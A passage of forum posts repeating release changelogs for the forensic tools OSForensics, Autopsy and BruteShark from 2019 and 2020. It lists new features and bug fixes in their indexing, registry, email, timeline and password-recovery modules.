    Fixed task activity LED not clearing after dumping process memory
    Added right-click menu for checked items
    Export checked processes memory dump to disk & case
    Added right-click menu option to dump checked process memory into single file

    Mismatch Search:

    Fixed "Identified Type" column header displaying as "Location"

    Registry Viewer:

    Initial implementation of exporting SAM/SOFTWARE registry hive reports
    Initial implementation of exporting SYSTEM/NTUSER.dat registry hive reports

    Start Window:

    Fixed icon groups re-ordering when changing workflow

    User activity:

    CSV export of checked items. Behaviour now matches export to text/html where if the ALL items view is currently selected it will export all checked items, but when viewing a specific item type only checked items of that item type are exported.
    CSV export, fixed a bug preventing the recycle bin items from being exported correctly.
    Fixed an issue with the column sorting when sorting by integer value (eg filesize) for Recycle bin, event, jumplist and shim cache items.

    $UsnJrnl viewer:

    Changed to detection of MFT record size rather than using hardcoded 1024 bytes
    Added additional debug logging when scanning MFT records

[close]

http://www.osforensics.com/
Titel: Autopsy 4.13.0
Beitrag von: SiLæncer am 15 Oktober, 2019, 12:00
Changelog

    General:

    Switch from Oracle JDK to OpenJDK.
    Full command line support (case creation, adding of data sources, running ingest, and generating reports).

    Logical Imager:

    Output can be individual files instead of VHD image (uses less space).
    More fine grained progress during collection and importing.
    Log of files and make artifacts.
    All console messages are saved to a log file too.
    Improved handling of cancellation when adding results into a case.

    Ingest Modules:

    Added Android support as Python modules for: Android installed apps, Android browser, Facebook Messenger, IMO, LINE, Opera, ORUX Maps, Samsung SBrowser, Skype, ShareIt, TextNow, Viber, WhatsApp, Xender, Zapya.
    Recycle Bin files are parsed in Recent Activity module, new artifacts are created, and deleted file entries are created at the original location of the deleted files. Code is based on Mark McKinnon’s RecycleBin module (https://github.com/markmckinnon/Autopsy-Plugins/tree/master/Recycle_Bin).
    ShellBag registry data is extracted from RegRipper in the Recent Activity module. New artifacts are recreated for the data. Based on Mark McKinnon’s “Parse ShellBags” module (https://github.com/markmckinnon/Autopsy-Plugins/tree/master/Parse_Shellbags).
    Additional data is extracted about users from SAM hive in Recent Activity module. Data includes password dates, permissions, groups, and full name. Based on Mark McKinnon’s “Parse SAM” module (https://github.com/markmckinnon/Autopsy-Plugins/tree/master/Parse_SAM).
    Email ingest module parses EML files. Based on Mark McKinnon’s “EML Parser” module (https://github.com/markmckinnon/Autopsy-Plugins/tree/master/EML_Parser).
    Fixed bug in MBOX module that caused attachments to have a “_” in the name.
    New Plaso ingest module that runs Plaso and generates events for the timeline.
    Fixed bug in Email module for VCard files to better parse phone number types.
    Keyword Search module waits longer for Solr to start to prevent incorrectly reporting a problem and disabling the feature.
    Embedded file extractor module was updated to not report compression bombs for GZIP files.

    Timeline:

    New approach for storing event data. A dedicated events table exists and is populated as files and artifacts are added to the database. No longer requires an explicit step of populating a local events table.
    Users can create their own events from the Timeline UI.
    Filtering was simplified based or existence of tag or hash set hit versus a specific name.
    Communications:

    Fixed bug that hid contact book entries with duplicate numbers.

    Image Gallery:

    Fixed bug in schema that caused errors with very long file names.

    Report:

    CASE report is included in a portable case.
    Image tags are included in portable case.
    More size options for a packaged portable case.
    New Infrastructure to support command line-based generation.

    Backend:

    Developers should use new new Blackboard.postArtifact() method to ensure artifact is indexed and added to the timeline.
    New classes were created to make it easier to write modules for apps.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 7.1.1000
Beitrag von: SiLæncer am 19 November, 2019, 12:26
Changelog

    NEW Event Log Viewer:

    New viewer to display windows event log files. Open logs in E01 images, filter logs, add log entries to the case, etc..

    Android Logical Copy:

    At completion, log will show the count of files copied by file extension.

    Case Manager:

    Fixed empty partitions being displayed in drop down list when adding physical drives to case
    Minor fix for BitLocker encrypted volume detection

    Clipboard viewer:

    Added some checks when ComBase.dll functions are being called that they exist to prevent a possible crash in Win7 when attempting to collect extended clipboard data

    Create/Search Index:

    New indexer build that adds XFS file system support
    Updated indexer fixed bug with search results from email attachments of ZIP files appearing under the Files tab instead of

    Email attachments:

    Added 'Export Search Results to CSV' feature on the 'History' tab, which allows user to export results from multiple search queries and multiple indexes at once.

    Debug mode - (Start Window):

    Added 'Restart OSF in Debug Mode' icon under 'Housekeeping' to restart OSF with 'DEBUGMODE' parameter set

    ESEDB Viewer:

    Updated libesedb library to libesedb-20181229
    Fixed major performance issue with very large ESEDB files (4GB+). Achieved roughly 40x speed improvement. Previously large files would be so slow to process that User Activity module looked like it had locked up. This should resolve this issue

    File system support:

    Added support for Linux XFS file system

    Logical Imaging:

    Fixed bug where root paths added from "Other Available Devices" were not being copied.

    Registry Viewer:

    Added right-click menu for exporting report to disk/case

    User activity:

    Added a new option in the config "Moved Downloads (Slow)" to control weather the drive is scanned for downloads that have been moved (Zone.Identifier streams), this is now off by default as it can be a slow process
    Replaced Jetblue API use with ESEDB library (libesedb) use when getting EDGE/IE10 history
    Added some more status messages for registry and browser processes
    Fixed sorting of columns for SRUM DB information

    Misc:

    Physical drive scanning for partitions at startup was updated so that OSF startup speed should be quicker and use less RAM.
    Fixed a bug in the disk partition detection code, it was not thread safe when running in debug mode, which could result in a rare crash at startup
    Help file updates

[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1001
Beitrag von: SiLæncer am 02 Dezember, 2019, 12:27
Changelog

Create / Search Index:

Fixed bug with Custom limit for Max File Size and Max Pages not applying when creating an index
Added ability to "Display Search Results" for multiple selected items in the "History" tab
Added "Path hash" column for "Export Search Results to CSV" to locate files that have been added to case (and stored in the "Files" folder)

Disk Imaging:

Read/Write/Hash threads now use their own I/O buffers to prevent memory access errors when a disk timeout occurs. This typically only happens when disk has a hardware fault. But it could result in a crash when it does happen.

ESEDB Viewer:

Fixed possible crash when loading a table in the ESEDB viewer

Event Log Viewer:

Reorganized elements in the main dialog and top menu.
Updated filter options in the Advanced Filter.
Added tree-view right-click menu.
Added Presets combo box for quick filtering. The user can also add their own preset filters by editing the test file, ProgramDataPassMarkOSForensicsEventLogPresets.txt
Updated list-view item selection to allow multiple item selection using mouse drag and right click menu Toggle Check to select them.

Internal viewer:

Metadata, Improved UI responsiveness by launching metadata collection process in a seperate thread.
Fixed bug in loading NTFS alternate streams when there is no file list

Raw disk viewer:

Added file system scanning for Linux XFS disks. XFS files, directories, and internal structures should be identified and highlighted.
Fixed bug in partition size for XFS disks

User Activity:

Allowed tagging of activity items that are not file paths (eg. registry keys, URLs, DB records, etc.)
Added an option in the list-view right-click menu for Event Log to allow users to open Event Log Viewer and locate the selected event.
Added 'Flags' column to identify 'tagged' items
Fixed Ctrl+T shortcut not working
Fixed memory allocation error due to invalid jump list entries
Fixed Web Browser tab not being highlighted when opening URL
Improved options to export to CSV and copy to clipboard from SRUM Database entries
[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1002
Beitrag von: SiLæncer am 06 Dezember, 2019, 12:24
Changelog

    Android Logical Copy:

    Fixed possible crash due to corrupted stack

    Event Log Viewer:

    Added Scan Folder button, this allow multiple event logs to be added to the viewer even when the event logs are found in a non-standard folder
    Added ability to add and delete multiple drives and folders in tree-view. Previously only files from one drive at a time could be added.
    Changed presets filtering configuration file, allowing more complicated filter conditions. Also added some additional preset fitlers
    Added a must "Not Contain" option to the event log filter conditions.

    User Activity:

    Results can now be sorted by tagged state by clicking on the "Flags" column
    Fixed crash when sorting by column that we accidentally introduced in last patch, opps.
    Added filtering of results by "Flags"
    USB, Opening USB device entries obtained from setupapi.dev.log or event log now opens the correct viewer
    WLN, Opening WLAN entries obtained from .xml file now opens the correct viewer
    Fixed right-click menu for USB/WLAN activity
    Fixed a crash that could occur if a scanned ESEDB database was corrupt. Seems to be rare as we have only

[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1003
Beitrag von: SiLæncer am 17 Dezember, 2019, 06:00
Changelog

    Create Index/Search Index
        Fixed bugs with indexing and searching large indexes containing more than 2million unique words. Also improved error reporting.
        Indexer now reports number of threads in log
        Added debug mode for OSFIndexer
    File System Browser
        Fixed jumping to disk offset when selected disk in raw disk viewer does not match
    Logical Imaging
        Fixed copying sparse files, were not being set as sparse on destination (if filesystem supports it)
    Raw disk viewer
        Support for jumping to XFS inode record
        Support for jumping to ext[2|3|4] inode record
        Added file system scanning for APFS disks. APFS files should be identified and highlighted.
        Added jump to APFS file offset
    SQLite Viewer
        Fixed "begins with" and "end with" query strings generating reversed queries
    Start Window
        Added "Check for Updates" icon under "Help and Information" for checking the most up-to-date OSF version
    User Activity
        Warn user if contents copied to clipboard exceeded limit and will be truncated.
    Misc
        Fixed disk dropdown box incorrectly display "Unknown/Empty partition" for all case devices

[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1004
Beitrag von: SiLæncer am 06 Januar, 2020, 09:08
Changelog

    Create Index/Search Index:

    Further fixes to indexing and searching large number of unique words (2mill+)
    Fixed bug with indexing files failed to be identified by magic being indexed as plain text (now treated as binary files). This may have caused extraneous data being indexed (leading to large number of unique words)
    Fixed bug with "Export search results to CSV" from "Search Index"->"History" tab, when the selected search results contain a mix of files and emails, the columns output in the CSV do not match up (emails will have more columns than the files).

    Email Viewer:

    Fixed bug with Email Viewer rejecting to open an MBOX file which contains non-ASCII characters, and the file is opened in the Internal File Viewer instead.

    ESEDB Viewer:

    dded missing error checks for non- existent table name. This caused out-of-index exception when performing User Activity scan on IE/Edge WebCache01.dat files.

    Passwords:

    Potential fix for crash when scanning for passwords in Credential Manager


[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1005
Beitrag von: SiLæncer am 24 Januar, 2020, 18:00
Changelog


    Case Manager
        Added support for opening tagged e-mails & attachments via double-click/right-click
    Create Index/Search Index
        Fixed bug when selecting file types for "Video", "Executables" or "Other" only (no files indexed when these are the only options selected)
        Fixed crash bug with indexing and extracting meta info for MP3 files containing TXXX frames
        Fixed bug with indexing files found within at least 3 recursive levels of ZIP files. These would show up with incorrect paths (missing ZIP file names) and unable to open the file from the Search Results
        Fixed bug with email messages in HTML or TXT format (not RTF) not being indexed as email filetype (and incorrectly showing up on the "Files" tab in OSF results)
        Fixed bug with MBOX files with no extensions (such as from Thunderbird) being indexed twice when we encounter the .MSF (mbox index) file.
        Fixed bug with MBOX files with no extensions failing to be recognised by the unknown file type identification function (magic).
        Updated PDF indexing to use CreationDate and ModDate from within PDF document properties
    File Name Search
        Presets, Updated default extensions to include heic/heif for images and hevc for videos.
    Generate Report
        Fixed Typos. Custom Logo area is always shown. Still only editable in Pro version.
    Start Page
        Fixed issue where some items were not being hidden when everything was unchecked in Customize Workflow.
    System Information
        Added collection of more fields when performing command ('Windows Info (Registry)'). Fixed collection of 'Install date' field.
    Misc
        Updated web browser video download function to work with current version of YouTube
        Added code to deal with non sector aligned access to physical disk
        Updated support bitlocker encryption. This can fix (some) instances of the "unsupported FVE metadata entry version" error.

[close]

http://www.osforensics.com/
Titel: Autopsy 4.14.0
Beitrag von: SiLæncer am 25 Januar, 2020, 19:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

    Specialized UIs:

    New File Discovery UI that allows you to search and filter for certain types of files. Works best with the Central Repository storing all of the hashes you've seen.
    New Map viewer that uses either Bing (when online) or offline map tiles.
    Communications UI shows country names for phone numbers and fixed bug in summary panel.
    Fixed bugs in timeline filtering.
    Refactored backend timeline filtering code based on The Sleuth Kit data model changes to remove JavaFX dependency.

    Data Sources:

    Added limited support for APFS disk images. Does not include encrypted volumes or ones that span multiple disks. Uses contribution to The Sleuth Kit from Black Bag Technologies.
    New data source processor that parses “XRY File Exports”.

    Content Viewers:

    Added a new “Context” viewer to show where a file came from. Currently shows what message a file was attached to or what URL a file was downloaded from.
    Added support to seek and change playback speed for videos in “Application” viewer.
    Improved support for Unicode HTML files in “Application” viewer.
    Added support for webp image files in “Application” viewer.

    Ingest Modules:

    Keyword Search module uses Decodetect statistical encoding detection for plain text files. Fixes issues with incorrect detection of Japanese files.
    Embedded File Extractor module uses statistical analysis to determine encoding of file names in ZIP files. Fixes issues with ZIP files created on Windows Japanese computers.
    Solr (Keyword Search module) now uses Japanese-specific tokenization using Kuromoji.
    Fixed Shellbags module in RegRipper (used by Autopsy Recent Activity module) to fix parsing errors.
    Plaso module no longer generates an error if enabled for non-disk image data sources.
    Added support for message attachments that are stored as an external file system file. Expanded Email and Android modules to use this technique.

    General:

    Fixed crashes by gstreamer when a video is selected.
    Added initial capability to delete a data source from a case (excludes data in the CR).
    Changed behavior of portable case menu item to automatically open the case and warn if it was already unpacked.
    Fixed bug that caused issues when case metadata had Unicode values.
    Added new Attachment APIs to the CommunicationsArtifactHelper class to support attachments stored as external file system files.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 7.1.1006
Beitrag von: SiLæncer am 18 Februar, 2020, 14:00
Changelog

    Auto Triage:

    Fixed a crash that could occur when collecting system information (via Auto Triage or System Information)
    Made some changes so less trial limitation warnings are displayed at the same time during Auto Triage

    Create Index:

    New indexer builds with updated BitLocker handling

    Generate Report:

    Fixed an issue with Logos not being enabled to be changed for Pro/Licensed.

    Passwords:

    Updated Password Decrypting .dll files and fixed issued with GPU decryption not running.

    User Activity:

    Export to CSV. Removed Flags field from CSV output causing column shift for some MRU types. Note: Flag values are for case specific and their values were never exported, but the column header for "Flags" was.Fixed shifted/misaligned column issue when exporting Event data to CSV.

    Web Browser:

    Fixed an issue where saving a webpage as web archive (.MHT) was no longer working.

[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1007
Beitrag von: SiLæncer am 05 März, 2020, 18:00
Changelog

    AmCache Viewer:

    Improved performance of reading amcache hive

    Create/ Compare SSignature:

    Added support for SHA-256 hashes. This required changing the signature file format and incrementing the signature file version from 6 -> 7.
    Add support for comparing previous signature file version with v7 signature file

    Create Index:

    Added "Memory dump files" file type option
    Added Email Attachment indexing options ("index attachments by file types")
    Updated indexer with chunked large binary file indexing, and progress indication
    New indexer builds with large file support for .mem, .dmp, .mdmp (large file support does not apply if inside ZIP files)
    New indexer builds with crash bug fixes

    Deleted Files:

    Internal changes to get sector size
    Forensic Imaging
    Added option to select between single/split files when creating Encase image files

    Passwords:

    Improved performance of retrieving registry passwords
    Improved performance of retrieving registry passwords
    Fixed various memory leak issues
    Fix heap corruption when retrieving LSA secrets
    Improved performance of reading Firefox logins from registry
    Improved performance of reading IE logins from registry
    Improved performance of reading Outlook/Windows Live logins from registry

    Registry:

    Added new registry function to read a single key in a hive for better performance without loading the entire registry file

    Scripting:

    Improved performance of RegistryGetSubKeys() and RegistryGetKeyValues() methods for reading registry keys

    System Information:

    Improved performance of registry commands

[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1008
Beitrag von: SiLæncer am 17 März, 2020, 11:00
Changelog

    Fixed crash bugs while indexing large Bitlocker images
    Fixed 'Skipping directory ...' log messages
    Changed handling of $' system files e.g. $AttrDef, $Bitmap, $boot, $LogFile, $MFTMirr, $Secure, $UpCase and $Volume are now only treated as filename index only. Only $MFT and $RECYCLE.BIN are binary extracted.
    RAM drive now allocates 2GB if >16GB of ram is available
    Added error messages for caching files and temp files.
    Updated PDF indexing to only use OCR when text layer is insufficient (avoid excessive OCR'ing files)

[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1009
Beitrag von: SiLæncer am 24 März, 2020, 11:00
Changelog

    Create Index:

    Fixed crash bug when multi-threaded indexing and extracting text from system binary files and non-system binary files

    Password Recovery:

    Added a dialog to allow individual partition selection when trying to run on a disk image mounted as the entire disk that contains multiple partitions
    Fixed a potential crash that could occur when recovering passwords (mostly affecting chrome passwords)

    Registry Viewer:

    Made some changes to work better with disk images mounted as the entire disk that contains multiple partitions, will now scan multiple partitions for known registry files

    User Activity:

    Added a dialog to allow individual partition selection when trying to run user activity on a disk image mounted as the entire disk that contains multiple partitions

[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1010
Beitrag von: SiLæncer am 25 März, 2020, 11:00
Changelog

    Auto triage / User activity:

    Fixed a crash that could occur when running user activity (or auto triage) using the live acquisition option

    Deleted Files:

    NTFS, Reading $ATTRIBUTE_LIST now uses a dynamic-sized buffer rather than a fixed-sized buffer. This may fix buffer overflow issues when scanning MFT
    NTFS, Added more verbose output when scanning $MFT attributes

[close]

http://www.osforensics.com/
Titel: OSForensics 7.1.1011
Beitrag von: SiLæncer am 20 April, 2020, 13:00
Changelog

    Case Manager:

    When deleting case, fixed case being deleted even when cancelling option to export case to disk

    Deleted Files:

    Fixed an issue where Prefetch and SRUMDB info wasn't being read correctly and would return 0 items
    Fixed a possible crash when collecting SRUMDB info

[close]

http://www.osforensics.com/
Titel: Autopsy 4.15.0
Beitrag von: SiLæncer am 01 Mai, 2020, 20:00
Changelog

    New UI Features:

    Added Document view to File Discovery.
    Expanded Context Content Viewer to show if an app accessed a file.
    Added translation feature to Message Content Viewer.
    Added waypoint type filter to the Geolocation viewer.
    Added zoom feature to Indexed Text Content Viewer.

    New Ingest Modules Features:

    New GPX ingest module.
    New Drone ingest module for DJI drones based on DatCon.
    Create artifacts for files opened by Adobe Reader, Windows Media Player, Office Docs (Most Recently Used (MRU) and TrustRecords), 7Zip MRU, WinRAR MRU, Applets, Microsoft Management Console (MMC) via RegRipper.

    New Central Repository Features:

    Central Repository stores account IDs that were previously seen.
    Central Repository is enabled by default to store past hashes. Feature to flag previously seen files is disabled by default.

    Other New Features:

    Multi-user cases can be created via command line

    Bug fixes:

    Prevent entire application from crashing when gstreamer crashes on videos.
    Improve Geolocation viewer with large data sets.
    Fix error with non-sector aligned reads on local disks.
    Times from Recycle Bin files are now in timeline.
    Validate timeline events and ignore events too far in the future.
    Moved some database queries off of UI thread.
    Remove hard coded sizes from UI that cause issues with other languages.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 7.1.1012
Beitrag von: SiLæncer am 28 Mai, 2020, 18:00
Changelog

    Case Manager:

    Fixed a crash that could occur when loading a case if a category name was longer than the max (63 characters).
    Fixed a bug allowing categories to be added with names longer than the max (63 characters).

    Create Index:

    Fixed crash bug when indexing smaller binary files (<25MB) with multi-threads.
    Fixed bug with 32-bit indexer failing to launch.

    Deleted Files:

    Carving, thread safety updates.
    Carving, fixed bug (read a offset outside of buffer) causing possible crash when carving TIFF files.

    Mobile Artifacts:

    Potential stack overflow crash fix.

[close]

http://www.osforensics.com/
Titel: OSForensics 8.0.3 Beta
Beitrag von: SiLæncer am 14 August, 2020, 19:00
Changelog

    Added New Face Detection module for still photographs & images:

    "Detect Faces" button was added in the Image Viewer
    "Sort by Faces" in File Name Search module as added. Depending on the set of images, accuracy is around 80% at the moment. We are hoping to get closer to 95% before the final release. This can make sorting through large collections of images much much faster

    Added new Web Server Log Viewer module:

    Can load up log files from Apache, IIS and other web servers, then filter and sort the log data. A lot of effort was invested to support the loading of very large log files without having huge amounts of system RAM

    Added new Python Scripting module:

    Implemented new scripting engine, which allows access to internal OSF functions from Python scripting. Scripting commands such as osf.UserActivityGetResult(), osf.ReportGenerate() & osf.LogicalImageStart() are now available
    Added support for built-in script Python templates installed under ProgramDataPassMarkOSForensicsScriptTemplates. The template can be selected under the 'New Script' button dropdown
    Added Python API reference for help file

    Added new Cloud Imaging support for Forensic Imaging:

    Added Cloud Download/Imaging for Google Drive, Microsoft OneDrive and Dropbox
    Cloud imaging will create empty files (0 byte files with ".deleted" extension) for deleted items from Dropbox. Dropbox includes deleted files in their directory listing

    AmCache Viewer:

    Improved performance of reading amcache hive

    Case Management:

    Add support for opening tagged e-mails & attachments via double-click/right-click

    Create Index:

    Added indexing for HEIC and HEIF image files (from Apple devices)
    Allowed indexing of memory dump files. .mem, Including .dmp, .mdmp (large file support does not apply if inside ZIP files)
    Improved speed of large binary file extraction indexing (by way of parallel / 2 thread concurrency)
    Fixed bytes progress status when indexing large binary file
    Added Email Attachment indexing options ("index attachments by file types")
    Fixed exiftool indexing issue (using the -fast3 parameter culled out alot of necessary meta information AND may incorrectly identify file type. Note removed -fast optimization will now be slower)
    Fixed indexing of some GPS meta information from exiftool
    Fixed issue with indexing OCR output from HEIC and HEIF files

    Create Signature:

    Added support for SHA-256 hashes. This required changing the signature file format and incrementing the signature file version from 6 -> 7
    Add support for comparing previous signature file version with v7 signature file

    Email Viewer:

    Support opening single e-mails from PST/DBX/MBOX files for faster loading
    Added exporting e-mail messages to MSG file format
    Add checkboxes to e-mail messages for bulk operations

    File name search:

    Changed configuration dialog to support modifying include/exclude folders for each preset. This allows for more accurate preset searches to be defined. Users can also define their own preset searches in the new advanced format
    Preset searches are now fixed and cannot be modified inline
    Added 'User-defined Search' for fully customizable search criteria

    Forensic Imaging:

    Add option to select between single/split files when creating Encase E01 image files

    Image Viewer:

    Added support for HEIC and HEIF image files (from Apple devices)
    Added support for extracting meta data from HEIC and HEIF files

    Passwords:

    Improved performance of reading Firefox, IE & Windows logins from registry
    Fix heap corruption when retrieving LSA secrets
    Fixed various memory leak issues

    Registry reading:

    Improved performance of RegistryGetSubKeys() and RegistryGetKeyValues() methods for reading registry keys
    Improved performance of reading registry entries in User Activity. On a 160MB SOFTWARE hive, load times improved from >10min to 20s (as compared to v7)
    Added new registry function to read a single key in a hive for better performance without loading the entire registry file first

    ThumbCache Viewer (complete rewrite):

    Redesigned the interface allowing to load a single cache file, add multiple files by scanning drive or folder
    Added a tree view to show list of added cache files, folders and drives
    Added a new "All" option to the Thumbnail Size combo box to show all records in a cache index file
    Added a new feature to allow loading multiple cache files and viewing all of the records in them in a single list view
    Added Extended Information to show EXIF data of thumbnails retrieved from ESE Database
    Updated the thumbnail preview window to be resizable
    Improved the efficiency of loading ESE Database

    Thumbnail View of files in various modules:

    Added support for displaying thumbnails for video files
    Support for animated video thumbnails on mouse hover (how cool is this!!)
    Changes to thumbnail caching thread for better performance and robustness
    Added support for deleted video thumbnails
    Files that do not have thumbnails are cached and no longer reloaded

    User Activity:

    Fixed bug in opening ARES registry key path
    Added more Windows Event IDs to extract more forensically interesting logs
    Added times to Browser Bookmarks and WLAN items
    Fixed Time Source display error for some items under All category
    Changed list-view default sorting as date and time descending order
    Improved column sorting speed. Sorting large data sets is now 50x faster
    Updated column names for Autorun Commands and UserAssist

    Boot Virtual Machine:

    Added the ability to select additional hard drives (data drives) when booting a VM from a disk image

[close]

http://www.osforensics.com/
Titel: Autopsy 4.16.0
Beitrag von: SiLæncer am 10 September, 2020, 09:07
Changelog

    Ingest:

    Added streaming ingest capability for disk images that allow files to be analyzed as soon as they are added to the database.
    Changed backend code so that disk image-based files are added by Java code instead of C/C++ code.

    Ingest Modules:

    Include Interesting File set rules for cloud storage, encryption, cryptocurrency and privacy programs.
    Updated PhotoRec 7.1 and include 64-bit version.
    Updated RegRipper in Recent Activity to 2.8
    Create artifacts for Prefetch, Background Activity Monitor, and System Resource Usage.
    Support MBOX files greater than 2GB.
    Document metadata is saved as explicit artifacts and added to the timeline.
    New “no change” hashset type that does not change status of file.

    Central Repository / Personas:

    Accounts in the Central Repository can be grouped together and associated with a digital persona.
    All accounts are now stored in the Central Repository to support correlation and persona creation.

    Content viewers:

    Created artifact-specific viewers in the Results viewer for contact book and call log.
    Moved Message viewer to a Results sub-viewer and expanded to show accounts.
    Added Application sub-viewer for PDF files based on IcePDF.
    Annotation viewer now includes comments from hash set hits.

    Geolocation Viewer:

    Different data types now are displayed using different colors.
    Track points in a track are now displayed as small, connected circles instead of full pins.
    Filter panel shows only data sources with geo location data.
    Geolocation artifact points can be tagged and commented upon.

    File Discovery:

    Changed UI to have more of a search flow and content viewer is hidden until an item is selected.

    Reports:

    Can be generated for a single data source instead of the entire case.
    CASE / UCO report module now includes artifacts in addition to files.
    Added backend concept of Tag Sets to support Project Vic categories from different countries.

    Performance:

    Add throttling of UI refreshes to ensure data is quickly displayed and the tree does not get backed up with requests.
    Improved efficiency of adding a data source with many orphan files.
    Improved efficiency of loading file systems.
    Jython interpreter is preloaded at application startup.

    Misc bug fixes and improvements:
 
  Fixed bug from last release where hex content viewer text was no longer fixed width.
    Altered locking to allow multiple data sources to be added at once more smoothly and to support batch inserts of file data.
    Central repository comments will no longer store tag descriptions.
    Account type nodes in the Accounts tree show counts.
    Full time stamps displayed for messages in ingest inbox.
    More detailed status during file exports.
    Improved efficiency of adding timeline events.
    Fixed bug with CVT most recent filter.
    Improved documentation and support for running on Linux/macOS.

[close]

http://www.sleuthkit.org/autopsy
Titel: BruteShark 1.1.1
Beitrag von: SiLæncer am 16 September, 2020, 05:00
(https://i.postimg.cc/SKYnyNkt/screenshot-2749.png)
BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack.

License: GPLv3

Whats new:>>

    BruteShark is now capable of reconstruct also all UDP streams.
    Configuration buttons where added featuring enabling / disabling reconstruction of TCP and / or UDP sessions

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1002
Beitrag von: SiLæncer am 09 November, 2020, 09:20
Changelog
       
    Auto Triage

        Fixed a broken link to the Auto Triage section in the help file

    Install to USB

        Fixed an issue where a ket.dat file created by OSForensics would not be read correctly when OSForensics starts

    Workflow

        Started saving config file immediately after locking the workflow rather than when OSForensics was closed so changes made to the workflow will be applied when installing to USB

[close]

http://www.osforensics.com/
Titel: Autopsy 4.17.0
Beitrag von: SiLæncer am 10 November, 2020, 12:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

    GUI:

    Expanded the Data Source Summary panel to show recent activity, past cases, analysis results, etc. Also made this available from the main UI when a data source is selected.
    Expanded Discovery UI to support searching for and basic display of web domains. It collapses the various web artifacts into a single view.

    Ingest Modules:

    Added iOS Analyzer module based on iLEAPP and a subset of its artifacts.
    New Picture Analyzer module that does EXIF extraction and HEIC conversion. HEIC/HEIF images are converted to JPEGs that retain EXIF using ImageMagick (replaces the previous EXIF ingest module).
    Added support for the latest version of Edge browser that is based on Chromium into Recent Activity. Other Chromium-based browsers are also supported.
    Updated the rules that search Web History artifacts for search queries. Expanded module to support multiple search engines for ambiguous URLs.
    Bluetooth pairing artifacts are created based on RegRipper output.
    Prefetch artifacts record the full path of exes.
    PhotoRec module allows you to include or exclude specific file types.
    Upgraded to Tika 1.23.

    Performance:

    Documents are added to Solr in batches instead of one by one.
    More efficient queries to find WAL files for SQLite databases.
    Use a local drive for temp files for multi-user cases instead of the shared folder.

    Command Line:

    Command line support for report profiles.
    Restored support for Windows file type association for opening a case in Autopsy by double clicking case metadata (.aut) file.
    Better feedback for command line argument errors.

    Misc:

    Updated versions of libvmdk, libvhdi, and libewf.
    Persona UI fixes: Pre-populate account and changed order of New Persona dialog.
    Streaming ingest support added to auto ingest.
    Recent Activity module processes now use the global timeout.
    Option to include Autopsy executable in portable case (Windows only.)
    Upgraded to NetBeans 11 Rich Client Platform.
    Added debug feature to save the stack trace on all threads.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 8.0.1003
Beitrag von: SiLæncer am 25 November, 2020, 10:00
Changelog

    Case Management

        Added a continue / stop option when a file copy fails (eg when creating a case report) rather than just stopping the current process

    Cloud Mail Export

        User can select which folder to export from account. An MBOX file will be created separately for each folder exported

    Deleted Files

        Added option in configuration to disable thumbnail creation as it may cause crashes in external windows libraries used to generate the thumbnails (eg media player) on poorly recovered / corrupt files

    File Name Search

        Added a new feature to allow for searching against image EXIF metadata

    OSFExtract

        Fixed issue where OSFExtract app would fail to install on older Android OS devices due to app signing issue

    Subscription

        Added deactivate seat option to the start page

    User Activity

        Event log, fixed a crash that could occur when reading a System log file caused by a very long file path in the event information

[close]

http://www.osforensics.com/
Titel: BruteShark 1.1.2
Beitrag von: SiLæncer am 01 Dezember, 2020, 19:00
(https://i.postimg.cc/SKYnyNkt/screenshot-2749.png)
BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack.

License: GPLv3

Whats new:>>

New features:

    New hash type extraction - Kerberos AS-REP etype 23 (including Hashcat integration - mode: 18200)
    BruteSharkCli can now export the network map to JSON format for analysis with external tools such as Neo4j.
    File extraction module support for PDF and ZIP file formats.
    BruteSharkDesktop GUI improvements - Indication for files that failed the analysis.

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1004
Beitrag von: SiLæncer am 04 Dezember, 2020, 10:00
Changelog
       
    Email Viewer

        Remove MAPI initialization from startup, loading on-demand
        Attempt to load MAPI dll from Outlook installation in registry (rather than mapi32.dll in Windows\System32) to prevent a "No mail client found" error message in some cases

    File Name Search

        Added vcruntime140_1.dll for exiv2.exe tool to fix missing DLL issue
        Updated EXIF Metadata search keywords preset list

    Hash Set Import

        Fixed a crash that could occur when importing NSRL hash sets

[close]

http://www.osforensics.com/
Titel: BruteShark 1.1.3
Beitrag von: SiLæncer am 14 Dezember, 2020, 21:30
Whats new:>>

New Module Release: DNS Module.
The module Enables to parse DNS queries.
DNS data also shown in the Network Map user window.

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1005
Beitrag von: SiLæncer am 29 Dezember, 2020, 10:00
Changelog
              
    Auto Triage

        Upgraded the screen capture to take screenshots of all running program windows.
        Removed the drive selection drop-down list and changed it to select the OS boot drive to perform live acquisition scanning.

    Case manager

